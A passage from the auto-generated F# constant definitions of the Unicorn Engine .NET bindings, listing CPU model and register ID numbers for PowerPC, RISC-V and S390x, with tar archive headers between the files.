let UC_CPU_PPC32_E300C4 = 64 let UC_CPU_PPC32_MPC8343 = 65 let UC_CPU_PPC32_MPC8343A = 66 let UC_CPU_PPC32_MPC8343E = 67 let UC_CPU_PPC32_MPC8343EA = 68 let UC_CPU_PPC32_MPC8347T = 69 let UC_CPU_PPC32_MPC8347P = 70 let UC_CPU_PPC32_MPC8347AT = 71 let UC_CPU_PPC32_MPC8347AP = 72 let UC_CPU_PPC32_MPC8347ET = 73 let UC_CPU_PPC32_MPC8347EP = 74 let UC_CPU_PPC32_MPC8347EAT = 75 let UC_CPU_PPC32_MPC8347EAP = 76 let UC_CPU_PPC32_MPC8349 = 77 let UC_CPU_PPC32_MPC8349A = 78 let UC_CPU_PPC32_MPC8349E = 79 let UC_CPU_PPC32_MPC8349EA = 80 let UC_CPU_PPC32_MPC8377 = 81 let UC_CPU_PPC32_MPC8377E = 82 let UC_CPU_PPC32_MPC8378 = 83 let UC_CPU_PPC32_MPC8378E = 84 let UC_CPU_PPC32_MPC8379 = 85 let UC_CPU_PPC32_MPC8379E = 86 let UC_CPU_PPC32_E500_V10 = 87 let UC_CPU_PPC32_E500_V20 = 88 let UC_CPU_PPC32_E500V2_V10 = 89 let UC_CPU_PPC32_E500V2_V20 = 90 let UC_CPU_PPC32_E500V2_V21 = 91 let UC_CPU_PPC32_E500V2_V22 = 92 let UC_CPU_PPC32_E500V2_V30 = 93 let UC_CPU_PPC32_E500MC = 94 let UC_CPU_PPC32_MPC8533_V10 = 95 let UC_CPU_PPC32_MPC8533_V11 = 96 let UC_CPU_PPC32_MPC8533E_V10 = 97 let UC_CPU_PPC32_MPC8533E_V11 = 98 let UC_CPU_PPC32_MPC8540_V10 = 99 let UC_CPU_PPC32_MPC8540_V20 = 100 let UC_CPU_PPC32_MPC8540_V21 = 101 let UC_CPU_PPC32_MPC8541_V10 = 102 let UC_CPU_PPC32_MPC8541_V11 = 103 let UC_CPU_PPC32_MPC8541E_V10 = 104 let UC_CPU_PPC32_MPC8541E_V11 = 105 let UC_CPU_PPC32_MPC8543_V10 = 106 let UC_CPU_PPC32_MPC8543_V11 = 107 let UC_CPU_PPC32_MPC8543_V20 = 108 let UC_CPU_PPC32_MPC8543_V21 = 109 let UC_CPU_PPC32_MPC8543E_V10 = 110 let UC_CPU_PPC32_MPC8543E_V11 = 111 let UC_CPU_PPC32_MPC8543E_V20 = 112 let UC_CPU_PPC32_MPC8543E_V21 = 113 let UC_CPU_PPC32_MPC8544_V10 = 114 let UC_CPU_PPC32_MPC8544_V11 = 115 let UC_CPU_PPC32_MPC8544E_V10 = 116 let UC_CPU_PPC32_MPC8544E_V11 = 117 let UC_CPU_PPC32_MPC8545_V20 = 118 let UC_CPU_PPC32_MPC8545_V21 = 119 let UC_CPU_PPC32_MPC8545E_V20 = 120 let UC_CPU_PPC32_MPC8545E_V21 = 121 let UC_CPU_PPC32_MPC8547E_V20 = 122 let UC_CPU_PPC32_MPC8547E_V21 = 123 let UC_CPU_PPC32_MPC8548_V10 = 124 let UC_CPU_PPC32_MPC8548_V11 = 125 let UC_CPU_PPC32_MPC8548_V20 = 126 let UC_CPU_PPC32_MPC8548_V21 = 127 let UC_CPU_PPC32_MPC8548E_V10 = 128 let UC_CPU_PPC32_MPC8548E_V11 = 129 let UC_CPU_PPC32_MPC8548E_V20 = 130 let UC_CPU_PPC32_MPC8548E_V21 = 131 let UC_CPU_PPC32_MPC8555_V10 = 132 let UC_CPU_PPC32_MPC8555_V11 = 133 let UC_CPU_PPC32_MPC8555E_V10 = 134 let UC_CPU_PPC32_MPC8555E_V11 = 135 let UC_CPU_PPC32_MPC8560_V10 = 136 let UC_CPU_PPC32_MPC8560_V20 = 137 let UC_CPU_PPC32_MPC8560_V21 = 138 let UC_CPU_PPC32_MPC8567 = 139 let UC_CPU_PPC32_MPC8567E = 140 let UC_CPU_PPC32_MPC8568 = 141 let UC_CPU_PPC32_MPC8568E = 142 let UC_CPU_PPC32_MPC8572 = 143 let UC_CPU_PPC32_MPC8572E = 144 let UC_CPU_PPC32_E600 = 145 let UC_CPU_PPC32_MPC8610 = 146 let UC_CPU_PPC32_MPC8641 = 147 let UC_CPU_PPC32_MPC8641D = 148 let UC_CPU_PPC32_601_V0 = 149 let UC_CPU_PPC32_601_V1 = 150 let UC_CPU_PPC32_601_V2 = 151 let UC_CPU_PPC32_602 = 152 let UC_CPU_PPC32_603 = 153 let UC_CPU_PPC32_603E_V1_1 = 154 let UC_CPU_PPC32_603E_V1_2 = 155 let UC_CPU_PPC32_603E_V1_3 = 156 let UC_CPU_PPC32_603E_V1_4 = 157 let UC_CPU_PPC32_603E_V2_2 = 158 let UC_CPU_PPC32_603E_V3 = 159 let UC_CPU_PPC32_603E_V4 = 160 let UC_CPU_PPC32_603E_V4_1 = 161 let UC_CPU_PPC32_603E7 = 162 let UC_CPU_PPC32_603E7T = 163 let UC_CPU_PPC32_603E7V = 164 let UC_CPU_PPC32_603E7V1 = 165 let UC_CPU_PPC32_603E7V2 = 166 let UC_CPU_PPC32_603P = 167 let UC_CPU_PPC32_604 = 168 let UC_CPU_PPC32_604E_V1_0 = 169 let UC_CPU_PPC32_604E_V2_2 = 170 let UC_CPU_PPC32_604E_V2_4 = 171 let UC_CPU_PPC32_604R = 172 let UC_CPU_PPC32_740_V1_0 = 173 let UC_CPU_PPC32_750_V1_0 = 174 let UC_CPU_PPC32_740_V2_0 = 175 let UC_CPU_PPC32_750_V2_0 = 176 let UC_CPU_PPC32_740_V2_1 = 177 let UC_CPU_PPC32_750_V2_1 = 178 let UC_CPU_PPC32_740_V2_2 = 179 let UC_CPU_PPC32_750_V2_2 = 180 let UC_CPU_PPC32_740_V3_0 = 181 let UC_CPU_PPC32_750_V3_0 = 182 let UC_CPU_PPC32_740_V3_1 = 183 let UC_CPU_PPC32_750_V3_1 = 184 let UC_CPU_PPC32_740E = 185 let UC_CPU_PPC32_750E = 186 let UC_CPU_PPC32_740P = 187 let UC_CPU_PPC32_750P = 188 let UC_CPU_PPC32_750CL_V1_0 = 189 let UC_CPU_PPC32_750CL_V2_0 = 190 let UC_CPU_PPC32_750CX_V1_0 = 191 let UC_CPU_PPC32_750CX_V2_0 = 192 let UC_CPU_PPC32_750CX_V2_1 = 193 let UC_CPU_PPC32_750CX_V2_2 = 194 let UC_CPU_PPC32_750CXE_V2_1 = 195 let UC_CPU_PPC32_750CXE_V2_2 = 196 let UC_CPU_PPC32_750CXE_V2_3 = 197 let UC_CPU_PPC32_750CXE_V2_4 = 198 let UC_CPU_PPC32_750CXE_V2_4B = 199 let UC_CPU_PPC32_750CXE_V3_0 = 200 let UC_CPU_PPC32_750CXE_V3_1 = 201 let UC_CPU_PPC32_750CXE_V3_1B = 202 let UC_CPU_PPC32_750CXR = 203 let UC_CPU_PPC32_750FL = 204 let UC_CPU_PPC32_750FX_V1_0 = 205 let UC_CPU_PPC32_750FX_V2_0 = 206 let UC_CPU_PPC32_750FX_V2_1 = 207 let UC_CPU_PPC32_750FX_V2_2 = 208 let UC_CPU_PPC32_750FX_V2_3 = 209 let UC_CPU_PPC32_750GL = 210 let UC_CPU_PPC32_750GX_V1_0 = 211 let UC_CPU_PPC32_750GX_V1_1 = 212 let UC_CPU_PPC32_750GX_V1_2 = 213 let UC_CPU_PPC32_750L_V2_0 = 214 let UC_CPU_PPC32_750L_V2_1 = 215 let UC_CPU_PPC32_750L_V2_2 = 216 let UC_CPU_PPC32_750L_V3_0 = 217 let UC_CPU_PPC32_750L_V3_2 = 218 let UC_CPU_PPC32_745_V1_0 = 219 let UC_CPU_PPC32_755_V1_0 = 220 let UC_CPU_PPC32_745_V1_1 = 221 let UC_CPU_PPC32_755_V1_1 = 222 let UC_CPU_PPC32_745_V2_0 = 223 let UC_CPU_PPC32_755_V2_0 = 224 let UC_CPU_PPC32_745_V2_1 = 225 let UC_CPU_PPC32_755_V2_1 = 226 let UC_CPU_PPC32_745_V2_2 = 227 let UC_CPU_PPC32_755_V2_2 = 228 let UC_CPU_PPC32_745_V2_3 = 229 let UC_CPU_PPC32_755_V2_3 = 230 let UC_CPU_PPC32_745_V2_4 = 231 let UC_CPU_PPC32_755_V2_4 = 232 let UC_CPU_PPC32_745_V2_5 = 233 let UC_CPU_PPC32_755_V2_5 = 234 let UC_CPU_PPC32_745_V2_6 = 235 let UC_CPU_PPC32_755_V2_6 = 236 let UC_CPU_PPC32_745_V2_7 = 237 let UC_CPU_PPC32_755_V2_7 = 238 let UC_CPU_PPC32_745_V2_8 = 239 let UC_CPU_PPC32_755_V2_8 = 240 let UC_CPU_PPC32_7400_V1_0 = 241 let UC_CPU_PPC32_7400_V1_1 = 242 let UC_CPU_PPC32_7400_V2_0 = 243 let UC_CPU_PPC32_7400_V2_1 = 244 let UC_CPU_PPC32_7400_V2_2 = 245 let UC_CPU_PPC32_7400_V2_6 = 246 let UC_CPU_PPC32_7400_V2_7 = 247 let UC_CPU_PPC32_7400_V2_8 = 248 let UC_CPU_PPC32_7400_V2_9 = 249 let UC_CPU_PPC32_7410_V1_0 = 250 let UC_CPU_PPC32_7410_V1_1 = 251 let UC_CPU_PPC32_7410_V1_2 = 252 let UC_CPU_PPC32_7410_V1_3 = 253 let UC_CPU_PPC32_7410_V1_4 = 254 let UC_CPU_PPC32_7448_V1_0 = 255 let UC_CPU_PPC32_7448_V1_1 = 256 let UC_CPU_PPC32_7448_V2_0 = 257 let UC_CPU_PPC32_7448_V2_1 = 258 let UC_CPU_PPC32_7450_V1_0 = 259 let UC_CPU_PPC32_7450_V1_1 = 260 let UC_CPU_PPC32_7450_V1_2 = 261 let UC_CPU_PPC32_7450_V2_0 = 262 let UC_CPU_PPC32_7450_V2_1 = 263 let UC_CPU_PPC32_7441_V2_1 = 264 let UC_CPU_PPC32_7441_V2_3 = 265 let UC_CPU_PPC32_7451_V2_3 = 266 let UC_CPU_PPC32_7441_V2_10 = 267 let UC_CPU_PPC32_7451_V2_10 = 268 let UC_CPU_PPC32_7445_V1_0 = 269 let UC_CPU_PPC32_7455_V1_0 = 270 let UC_CPU_PPC32_7445_V2_1 = 271 let UC_CPU_PPC32_7455_V2_1 = 272 let UC_CPU_PPC32_7445_V3_2 = 273 let UC_CPU_PPC32_7455_V3_2 = 274 let UC_CPU_PPC32_7445_V3_3 = 275 let UC_CPU_PPC32_7455_V3_3 = 276 let UC_CPU_PPC32_7445_V3_4 = 277 let UC_CPU_PPC32_7455_V3_4 = 278 let UC_CPU_PPC32_7447_V1_0 = 279 let UC_CPU_PPC32_7457_V1_0 = 280 let UC_CPU_PPC32_7447_V1_1 = 281 let UC_CPU_PPC32_7457_V1_1 = 282 let UC_CPU_PPC32_7457_V1_2 = 283 let UC_CPU_PPC32_7447A_V1_0 = 284 let UC_CPU_PPC32_7457A_V1_0 = 285 let UC_CPU_PPC32_7447A_V1_1 = 286 let UC_CPU_PPC32_7457A_V1_1 = 287 let UC_CPU_PPC32_7447A_V1_2 = 288 let UC_CPU_PPC32_7457A_V1_2 = 289 let UC_CPU_PPC32_ENDING = 290 // PPC64 CPU let UC_CPU_PPC64_E5500 = 0 let UC_CPU_PPC64_E6500 = 1 let UC_CPU_PPC64_970_V2_2 = 2 let UC_CPU_PPC64_970FX_V1_0 = 3 let UC_CPU_PPC64_970FX_V2_0 = 4 let UC_CPU_PPC64_970FX_V2_1 = 5 let UC_CPU_PPC64_970FX_V3_0 = 6 let UC_CPU_PPC64_970FX_V3_1 = 7 let UC_CPU_PPC64_970MP_V1_0 = 8 let UC_CPU_PPC64_970MP_V1_1 = 9 let UC_CPU_PPC64_POWER5_V2_1 = 10 let UC_CPU_PPC64_POWER7_V2_3 = 11 let UC_CPU_PPC64_POWER7_V2_1 = 12 let UC_CPU_PPC64_POWER8E_V2_1 = 13 let UC_CPU_PPC64_POWER8_V2_0 = 14 let UC_CPU_PPC64_POWER8NVL_V1_0 = 15 let UC_CPU_PPC64_POWER9_V1_0 = 16 let UC_CPU_PPC64_POWER9_V2_0 = 17 let UC_CPU_PPC64_POWER10_V1_0 = 18 let UC_CPU_PPC64_ENDING = 19 // PPC registers let UC_PPC_REG_INVALID = 0 // General purpose registers let UC_PPC_REG_PC = 1 let UC_PPC_REG_0 = 2 let UC_PPC_REG_1 = 3 let UC_PPC_REG_2 = 4 let UC_PPC_REG_3 = 5 let UC_PPC_REG_4 = 6 let UC_PPC_REG_5 = 7 let UC_PPC_REG_6 = 8 let UC_PPC_REG_7 = 9 let UC_PPC_REG_8 = 10 let UC_PPC_REG_9 = 11 let UC_PPC_REG_10 = 12 let UC_PPC_REG_11 = 13 let UC_PPC_REG_12 = 14 let UC_PPC_REG_13 = 15 let UC_PPC_REG_14 = 16 let UC_PPC_REG_15 = 17 let UC_PPC_REG_16 = 18 let UC_PPC_REG_17 = 19 let UC_PPC_REG_18 = 20 let UC_PPC_REG_19 = 21 let UC_PPC_REG_20 = 22 let UC_PPC_REG_21 = 23 let UC_PPC_REG_22 = 24 let UC_PPC_REG_23 = 25 let UC_PPC_REG_24 = 26 let UC_PPC_REG_25 = 27 let UC_PPC_REG_26 = 28 let UC_PPC_REG_27 = 29 let UC_PPC_REG_28 = 30 let UC_PPC_REG_29 = 31 let UC_PPC_REG_30 = 32 let UC_PPC_REG_31 = 33 let UC_PPC_REG_CR0 = 34 let UC_PPC_REG_CR1 = 35 let UC_PPC_REG_CR2 = 36 let UC_PPC_REG_CR3 = 37 let UC_PPC_REG_CR4 = 38 let UC_PPC_REG_CR5 = 39 let UC_PPC_REG_CR6 = 40 let UC_PPC_REG_CR7 = 41 let UC_PPC_REG_FPR0 = 42 let UC_PPC_REG_FPR1 = 43 let UC_PPC_REG_FPR2 = 44 let UC_PPC_REG_FPR3 = 45 let UC_PPC_REG_FPR4 = 46 let UC_PPC_REG_FPR5 = 47 let UC_PPC_REG_FPR6 = 48 let UC_PPC_REG_FPR7 = 49 let UC_PPC_REG_FPR8 = 50 let UC_PPC_REG_FPR9 = 51 let UC_PPC_REG_FPR10 = 52 let UC_PPC_REG_FPR11 = 53 let UC_PPC_REG_FPR12 = 54 let UC_PPC_REG_FPR13 = 55 let UC_PPC_REG_FPR14 = 56 let UC_PPC_REG_FPR15 = 57 let UC_PPC_REG_FPR16 = 58 let UC_PPC_REG_FPR17 = 59 let UC_PPC_REG_FPR18 = 60 let UC_PPC_REG_FPR19 = 61 let UC_PPC_REG_FPR20 = 62 let UC_PPC_REG_FPR21 = 63 let UC_PPC_REG_FPR22 = 64 let UC_PPC_REG_FPR23 = 65 let UC_PPC_REG_FPR24 = 66 let UC_PPC_REG_FPR25 = 67 let UC_PPC_REG_FPR26 = 68 let UC_PPC_REG_FPR27 = 69 let UC_PPC_REG_FPR28 = 70 let UC_PPC_REG_FPR29 = 71 let UC_PPC_REG_FPR30 = 72 let UC_PPC_REG_FPR31 = 73 let UC_PPC_REG_LR = 74 let UC_PPC_REG_XER = 75 let UC_PPC_REG_CTR = 76 let UC_PPC_REG_MSR = 77 let UC_PPC_REG_FPSCR = 78 let UC_PPC_REG_CR = 79 let UC_PPC_REG_ENDING = 80 unicorn-2.1.1/bindings/dotnet/UnicornEngine/Const/Riscv.fs000066400000000000000000000217451467524106700235600ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT namespace UnicornEngine.Const open System [] module Riscv = // RISCV32 CPU let UC_CPU_RISCV32_ANY = 0 let UC_CPU_RISCV32_BASE32 = 1 let UC_CPU_RISCV32_SIFIVE_E31 = 2 let UC_CPU_RISCV32_SIFIVE_U34 = 3 let UC_CPU_RISCV32_ENDING = 4 // RISCV64 CPU let UC_CPU_RISCV64_ANY = 0 let UC_CPU_RISCV64_BASE64 = 1 let UC_CPU_RISCV64_SIFIVE_E51 = 2 let UC_CPU_RISCV64_SIFIVE_U54 = 3 let UC_CPU_RISCV64_ENDING = 4 // RISCV registers let UC_RISCV_REG_INVALID = 0 // General purpose registers let UC_RISCV_REG_X0 = 1 let UC_RISCV_REG_X1 = 2 let UC_RISCV_REG_X2 = 3 let UC_RISCV_REG_X3 = 4 let UC_RISCV_REG_X4 = 5 let UC_RISCV_REG_X5 = 6 let UC_RISCV_REG_X6 = 7 let UC_RISCV_REG_X7 = 8 let UC_RISCV_REG_X8 = 9 let UC_RISCV_REG_X9 = 10 let UC_RISCV_REG_X10 = 11 let UC_RISCV_REG_X11 = 12 let UC_RISCV_REG_X12 = 13 let UC_RISCV_REG_X13 = 14 let UC_RISCV_REG_X14 = 15 let UC_RISCV_REG_X15 = 16 let UC_RISCV_REG_X16 = 17 let UC_RISCV_REG_X17 = 18 let UC_RISCV_REG_X18 = 19 let UC_RISCV_REG_X19 = 20 let UC_RISCV_REG_X20 = 21 let UC_RISCV_REG_X21 = 22 let UC_RISCV_REG_X22 = 23 let UC_RISCV_REG_X23 = 24 let UC_RISCV_REG_X24 = 25 let UC_RISCV_REG_X25 = 26 let UC_RISCV_REG_X26 = 27 let UC_RISCV_REG_X27 = 28 let UC_RISCV_REG_X28 = 29 let UC_RISCV_REG_X29 = 30 let UC_RISCV_REG_X30 = 31 let UC_RISCV_REG_X31 = 32 // RISCV CSR let UC_RISCV_REG_USTATUS = 33 let UC_RISCV_REG_UIE = 34 let UC_RISCV_REG_UTVEC = 35 let UC_RISCV_REG_USCRATCH = 36 let UC_RISCV_REG_UEPC = 37 let UC_RISCV_REG_UCAUSE = 38 let UC_RISCV_REG_UTVAL = 39 let UC_RISCV_REG_UIP = 40 let UC_RISCV_REG_FFLAGS = 41 let UC_RISCV_REG_FRM = 42 let UC_RISCV_REG_FCSR = 43 let UC_RISCV_REG_CYCLE = 44 let UC_RISCV_REG_TIME = 45 let UC_RISCV_REG_INSTRET = 46 let UC_RISCV_REG_HPMCOUNTER3 = 47 let UC_RISCV_REG_HPMCOUNTER4 = 48 let UC_RISCV_REG_HPMCOUNTER5 = 49 let UC_RISCV_REG_HPMCOUNTER6 = 50 let UC_RISCV_REG_HPMCOUNTER7 = 51 let UC_RISCV_REG_HPMCOUNTER8 = 52 let UC_RISCV_REG_HPMCOUNTER9 = 53 let UC_RISCV_REG_HPMCOUNTER10 = 54 let UC_RISCV_REG_HPMCOUNTER11 = 55 let UC_RISCV_REG_HPMCOUNTER12 = 56 let UC_RISCV_REG_HPMCOUNTER13 = 57 let UC_RISCV_REG_HPMCOUNTER14 = 58 let UC_RISCV_REG_HPMCOUNTER15 = 59 let UC_RISCV_REG_HPMCOUNTER16 = 60 let UC_RISCV_REG_HPMCOUNTER17 = 61 let UC_RISCV_REG_HPMCOUNTER18 = 62 let UC_RISCV_REG_HPMCOUNTER19 = 63 let UC_RISCV_REG_HPMCOUNTER20 = 64 let UC_RISCV_REG_HPMCOUNTER21 = 65 let UC_RISCV_REG_HPMCOUNTER22 = 66 let UC_RISCV_REG_HPMCOUNTER23 = 67 let UC_RISCV_REG_HPMCOUNTER24 = 68 let UC_RISCV_REG_HPMCOUNTER25 = 69 let UC_RISCV_REG_HPMCOUNTER26 = 70 let UC_RISCV_REG_HPMCOUNTER27 = 71 let UC_RISCV_REG_HPMCOUNTER28 = 72 let UC_RISCV_REG_HPMCOUNTER29 = 73 let UC_RISCV_REG_HPMCOUNTER30 = 74 let UC_RISCV_REG_HPMCOUNTER31 = 75 let UC_RISCV_REG_CYCLEH = 76 let UC_RISCV_REG_TIMEH = 77 let UC_RISCV_REG_INSTRETH = 78 let UC_RISCV_REG_HPMCOUNTER3H = 79 let UC_RISCV_REG_HPMCOUNTER4H = 80 let UC_RISCV_REG_HPMCOUNTER5H = 81 let UC_RISCV_REG_HPMCOUNTER6H = 82 let UC_RISCV_REG_HPMCOUNTER7H = 83 let UC_RISCV_REG_HPMCOUNTER8H = 84 let UC_RISCV_REG_HPMCOUNTER9H = 85 let UC_RISCV_REG_HPMCOUNTER10H = 86 let UC_RISCV_REG_HPMCOUNTER11H = 87 let UC_RISCV_REG_HPMCOUNTER12H = 88 let UC_RISCV_REG_HPMCOUNTER13H = 89 let UC_RISCV_REG_HPMCOUNTER14H = 90 let UC_RISCV_REG_HPMCOUNTER15H = 91 let UC_RISCV_REG_HPMCOUNTER16H = 92 let UC_RISCV_REG_HPMCOUNTER17H = 93 let UC_RISCV_REG_HPMCOUNTER18H = 94 let UC_RISCV_REG_HPMCOUNTER19H = 95 let UC_RISCV_REG_HPMCOUNTER20H = 96 let UC_RISCV_REG_HPMCOUNTER21H = 97 let UC_RISCV_REG_HPMCOUNTER22H = 98 let UC_RISCV_REG_HPMCOUNTER23H = 99 let UC_RISCV_REG_HPMCOUNTER24H = 100 let UC_RISCV_REG_HPMCOUNTER25H = 101 let UC_RISCV_REG_HPMCOUNTER26H = 102 let UC_RISCV_REG_HPMCOUNTER27H = 103 let UC_RISCV_REG_HPMCOUNTER28H = 104 let UC_RISCV_REG_HPMCOUNTER29H = 105 let UC_RISCV_REG_HPMCOUNTER30H = 106 let UC_RISCV_REG_HPMCOUNTER31H = 107 let UC_RISCV_REG_MCYCLE = 108 let UC_RISCV_REG_MINSTRET = 109 let UC_RISCV_REG_MCYCLEH = 110 let UC_RISCV_REG_MINSTRETH = 111 let UC_RISCV_REG_MVENDORID = 112 let UC_RISCV_REG_MARCHID = 113 let UC_RISCV_REG_MIMPID = 114 let UC_RISCV_REG_MHARTID = 115 let UC_RISCV_REG_MSTATUS = 116 let UC_RISCV_REG_MISA = 117 let UC_RISCV_REG_MEDELEG = 118 let UC_RISCV_REG_MIDELEG = 119 let UC_RISCV_REG_MIE = 120 let UC_RISCV_REG_MTVEC = 121 let UC_RISCV_REG_MCOUNTEREN = 122 let UC_RISCV_REG_MSTATUSH = 123 let UC_RISCV_REG_MUCOUNTEREN = 124 let UC_RISCV_REG_MSCOUNTEREN = 125 let UC_RISCV_REG_MHCOUNTEREN = 126 let UC_RISCV_REG_MSCRATCH = 127 let UC_RISCV_REG_MEPC = 128 let UC_RISCV_REG_MCAUSE = 129 let UC_RISCV_REG_MTVAL = 130 let UC_RISCV_REG_MIP = 131 let UC_RISCV_REG_MBADADDR = 132 let UC_RISCV_REG_SSTATUS = 133 let UC_RISCV_REG_SEDELEG = 134 let UC_RISCV_REG_SIDELEG = 135 let UC_RISCV_REG_SIE = 136 let UC_RISCV_REG_STVEC = 137 let UC_RISCV_REG_SCOUNTEREN = 138 let UC_RISCV_REG_SSCRATCH = 139 let UC_RISCV_REG_SEPC = 140 let UC_RISCV_REG_SCAUSE = 141 let UC_RISCV_REG_STVAL = 142 let UC_RISCV_REG_SIP = 143 let UC_RISCV_REG_SBADADDR = 144 let UC_RISCV_REG_SPTBR = 145 let UC_RISCV_REG_SATP = 146 let UC_RISCV_REG_HSTATUS = 147 let UC_RISCV_REG_HEDELEG = 148 let UC_RISCV_REG_HIDELEG = 149 let UC_RISCV_REG_HIE = 150 let UC_RISCV_REG_HCOUNTEREN = 151 let UC_RISCV_REG_HTVAL = 152 let UC_RISCV_REG_HIP = 153 let UC_RISCV_REG_HTINST = 154 let UC_RISCV_REG_HGATP = 155 let UC_RISCV_REG_HTIMEDELTA = 156 let UC_RISCV_REG_HTIMEDELTAH = 157 // Floating-point registers let UC_RISCV_REG_F0 = 158 let UC_RISCV_REG_F1 = 159 let UC_RISCV_REG_F2 = 160 let UC_RISCV_REG_F3 = 161 let UC_RISCV_REG_F4 = 162 let UC_RISCV_REG_F5 = 163 let UC_RISCV_REG_F6 = 164 let UC_RISCV_REG_F7 = 165 let UC_RISCV_REG_F8 = 166 let UC_RISCV_REG_F9 = 167 let UC_RISCV_REG_F10 = 168 let UC_RISCV_REG_F11 = 169 let UC_RISCV_REG_F12 = 170 let UC_RISCV_REG_F13 = 171 let UC_RISCV_REG_F14 = 172 let UC_RISCV_REG_F15 = 173 let UC_RISCV_REG_F16 = 174 let UC_RISCV_REG_F17 = 175 let UC_RISCV_REG_F18 = 176 let UC_RISCV_REG_F19 = 177 let UC_RISCV_REG_F20 = 178 let UC_RISCV_REG_F21 = 179 let UC_RISCV_REG_F22 = 180 let UC_RISCV_REG_F23 = 181 let UC_RISCV_REG_F24 = 182 let UC_RISCV_REG_F25 = 183 let UC_RISCV_REG_F26 = 184 let UC_RISCV_REG_F27 = 185 let UC_RISCV_REG_F28 = 186 let UC_RISCV_REG_F29 = 187 let UC_RISCV_REG_F30 = 188 let UC_RISCV_REG_F31 = 189 let UC_RISCV_REG_PC = 190 let UC_RISCV_REG_ENDING = 191 // Alias registers let UC_RISCV_REG_ZERO = 1 let UC_RISCV_REG_RA = 2 let UC_RISCV_REG_SP = 3 let UC_RISCV_REG_GP = 4 let UC_RISCV_REG_TP = 5 let UC_RISCV_REG_T0 = 6 let UC_RISCV_REG_T1 = 7 let UC_RISCV_REG_T2 = 8 let UC_RISCV_REG_S0 = 9 let UC_RISCV_REG_FP = 9 let UC_RISCV_REG_S1 = 10 let UC_RISCV_REG_A0 = 11 let UC_RISCV_REG_A1 = 12 let UC_RISCV_REG_A2 = 13 let UC_RISCV_REG_A3 = 14 let UC_RISCV_REG_A4 = 15 let UC_RISCV_REG_A5 = 16 let UC_RISCV_REG_A6 = 17 let UC_RISCV_REG_A7 = 18 let UC_RISCV_REG_S2 = 19 let UC_RISCV_REG_S3 = 20 let UC_RISCV_REG_S4 = 21 let UC_RISCV_REG_S5 = 22 let UC_RISCV_REG_S6 = 23 let UC_RISCV_REG_S7 = 24 let UC_RISCV_REG_S8 = 25 let UC_RISCV_REG_S9 = 26 let UC_RISCV_REG_S10 = 27 let UC_RISCV_REG_S11 = 28 let UC_RISCV_REG_T3 = 29 let UC_RISCV_REG_T4 = 30 let UC_RISCV_REG_T5 = 31 let UC_RISCV_REG_T6 = 32 let UC_RISCV_REG_FT0 = 158 let UC_RISCV_REG_FT1 = 159 let UC_RISCV_REG_FT2 = 160 let UC_RISCV_REG_FT3 = 161 let UC_RISCV_REG_FT4 = 162 let UC_RISCV_REG_FT5 = 163 let UC_RISCV_REG_FT6 = 164 let UC_RISCV_REG_FT7 = 165 let UC_RISCV_REG_FS0 = 166 let UC_RISCV_REG_FS1 = 167 let UC_RISCV_REG_FA0 = 168 let UC_RISCV_REG_FA1 = 169 let UC_RISCV_REG_FA2 = 170 let UC_RISCV_REG_FA3 = 171 let UC_RISCV_REG_FA4 = 172 let UC_RISCV_REG_FA5 = 173 let UC_RISCV_REG_FA6 = 174 let UC_RISCV_REG_FA7 = 175 let UC_RISCV_REG_FS2 = 176 let UC_RISCV_REG_FS3 = 177 let UC_RISCV_REG_FS4 = 178 let UC_RISCV_REG_FS5 = 179 let UC_RISCV_REG_FS6 = 180 let UC_RISCV_REG_FS7 = 181 let UC_RISCV_REG_FS8 = 182 let UC_RISCV_REG_FS9 = 183 let UC_RISCV_REG_FS10 = 184 let UC_RISCV_REG_FS11 = 185 let UC_RISCV_REG_FT8 = 186 let UC_RISCV_REG_FT9 = 187 let UC_RISCV_REG_FT10 = 188 let UC_RISCV_REG_FT11 = 189 unicorn-2.1.1/bindings/dotnet/UnicornEngine/Const/S390x.fs000066400000000000000000000067271467524106700233230ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT namespace UnicornEngine.Const open System [] module S390x = // S390X CPU let UC_CPU_S390X_Z900 = 0 let UC_CPU_S390X_Z900_2 = 1 let UC_CPU_S390X_Z900_3 = 2 let UC_CPU_S390X_Z800 = 3 let UC_CPU_S390X_Z990 = 4 let UC_CPU_S390X_Z990_2 = 5 let UC_CPU_S390X_Z990_3 = 6 let UC_CPU_S390X_Z890 = 7 let UC_CPU_S390X_Z990_4 = 8 let UC_CPU_S390X_Z890_2 = 9 let UC_CPU_S390X_Z990_5 = 10 let UC_CPU_S390X_Z890_3 = 11 let UC_CPU_S390X_Z9EC = 12 let UC_CPU_S390X_Z9EC_2 = 13 let UC_CPU_S390X_Z9BC = 14 let UC_CPU_S390X_Z9EC_3 = 15 let UC_CPU_S390X_Z9BC_2 = 16 let UC_CPU_S390X_Z10EC = 17 let UC_CPU_S390X_Z10EC_2 = 18 let UC_CPU_S390X_Z10BC = 19 let UC_CPU_S390X_Z10EC_3 = 20 let UC_CPU_S390X_Z10BC_2 = 21 let UC_CPU_S390X_Z196 = 22 let UC_CPU_S390X_Z196_2 = 23 let UC_CPU_S390X_Z114 = 24 let UC_CPU_S390X_ZEC12 = 25 let UC_CPU_S390X_ZEC12_2 = 26 let UC_CPU_S390X_ZBC12 = 27 let UC_CPU_S390X_Z13 = 28 let UC_CPU_S390X_Z13_2 = 29 let UC_CPU_S390X_Z13S = 30 let UC_CPU_S390X_Z14 = 31 let UC_CPU_S390X_Z14_2 = 32 let UC_CPU_S390X_Z14ZR1 = 33 let UC_CPU_S390X_GEN15A = 34 let UC_CPU_S390X_GEN15B = 35 let UC_CPU_S390X_QEMU = 36 let UC_CPU_S390X_MAX = 37 let UC_CPU_S390X_ENDING = 38 // S390X registers let UC_S390X_REG_INVALID = 0 // General purpose registers let UC_S390X_REG_R0 = 1 let UC_S390X_REG_R1 = 2 let UC_S390X_REG_R2 = 3 let UC_S390X_REG_R3 = 4 let UC_S390X_REG_R4 = 5 let UC_S390X_REG_R5 = 6 let UC_S390X_REG_R6 = 7 let UC_S390X_REG_R7 = 8 let UC_S390X_REG_R8 = 9 let UC_S390X_REG_R9 = 10 let UC_S390X_REG_R10 = 11 let UC_S390X_REG_R11 = 12 let UC_S390X_REG_R12 = 13 let UC_S390X_REG_R13 = 14 let UC_S390X_REG_R14 = 15 let UC_S390X_REG_R15 = 16 // Floating point registers let UC_S390X_REG_F0 = 17 let UC_S390X_REG_F1 = 18 let UC_S390X_REG_F2 = 19 let UC_S390X_REG_F3 = 20 let UC_S390X_REG_F4 = 21 let UC_S390X_REG_F5 = 22 let UC_S390X_REG_F6 